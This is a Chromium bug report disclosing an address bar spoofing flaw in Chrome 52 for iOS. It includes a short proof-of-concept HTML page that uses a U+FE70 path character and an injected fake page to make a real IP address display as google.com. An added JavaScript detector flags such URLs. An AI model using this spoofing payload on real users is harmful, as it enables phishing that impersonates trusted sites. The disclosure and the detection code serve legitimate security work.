Address Bar Spoofing in Chrome 52.0.2743.84 iOS
Reported by
martinzh...@gmail.com,
Aug 17 2016
Issue description
Steps to reproduce the problem:
1. Open the PoC page (spoof.html):
http://115.159.58.203/spoof/index.html
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body>
<form action="http://115.159.58.203/%EF%B9%B0/https://www.google.com/m" target="aa" method="post" onsubmit="setTimeout('p()',1000);">
<input type="submit">
</form>
<script>
function p() {
var t = window.open('','aa');
t.document.body.innerHTML = '<h1 style="color:blue;">Fake Mozila Homepage!</h1>';
t.stop();
}
</script>
</body>
</html>
2. Click "Submit"; the spoofed page is shown.
What is the expected behavior?
What went wrong?
The URL "http://115.159.58.203/%EF%B9%B0/https://www.google.com/m" will be displayed in the Chrome iOS version's address bar like "https://www.google.com/m/"/115.159.58.203", so an attacker could spoof Google's homepage in the Chrome iOS version.
Did this work before? N/A
Chrome version: 52.0.2743.84 Channel: stable
OS Version: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko)
Flash Version: Shockwave Flash 22.0 r0
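A defensive check for the URL shape in this report, as an added example that is not part of the original report or of Chromium's code: it decodes the path, flags right-to-left or bidi-control characters (`%EF%B9%B0` is the UTF-8 encoding of U+FE70, an Arabic presentation form) and a second `scheme://host` inside the path, and returns the real origin to show instead. The function names and the "both signals present" policy are assumptions.

```javascript
// Added example (hypothetical helper names): detect URLs whose path could be
// mistaken for a different origin when rendered in an address bar.

// Right-to-left scripts (Hebrew, Arabic, Arabic Presentation Forms A/B)
// plus explicit bidi control characters.
const RTL_OR_BIDI =
  /[\u0590-\u08FF\uFB1D-\uFDFF\uFE70-\uFEFF\u200E\u200F\u202A-\u202E\u2066-\u2069]/u;

// A second "scheme://host" appearing after the real host.
const EMBEDDED_URL = /\bhttps?:\/\/[^/\s]+/i;

// decodeURIComponent throws on malformed escapes; fall back to the raw text.
function safeDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch {
    return s;
  }
}

function analyzeDisplayRisk(rawUrl) {
  const url = new URL(rawUrl);
  // Everything after the host is attacker-controlled text.
  const tail = safeDecode(url.pathname + url.search + url.hash);
  const findings = [];

  const m = RTL_OR_BIDI.exec(tail);
  if (m) {
    const cp = m[0].codePointAt(0).toString(16).toUpperCase().padStart(4, '0');
    findings.push(`rtl-or-bidi-char U+${cp}`);
  }
  if (EMBEDDED_URL.test(tail)) {
    findings.push('embedded-url-in-path');
  }

  return {
    origin: url.origin,                 // what is safe to display
    findings,
    suspicious: findings.length === 2,  // assumed policy: both signals present
  };
}

// URL taken from the report above.
const reported = analyzeDisplayRisk(
  'http://115.159.58.203/%EF%B9%B0/https://www.google.com/m');
console.log(reported);
```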
Nov 24 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by jialiul@chromium.org, Aug 17 2016
Components: UI>Browser>Omnibox
Owner: justincohen@chromium.org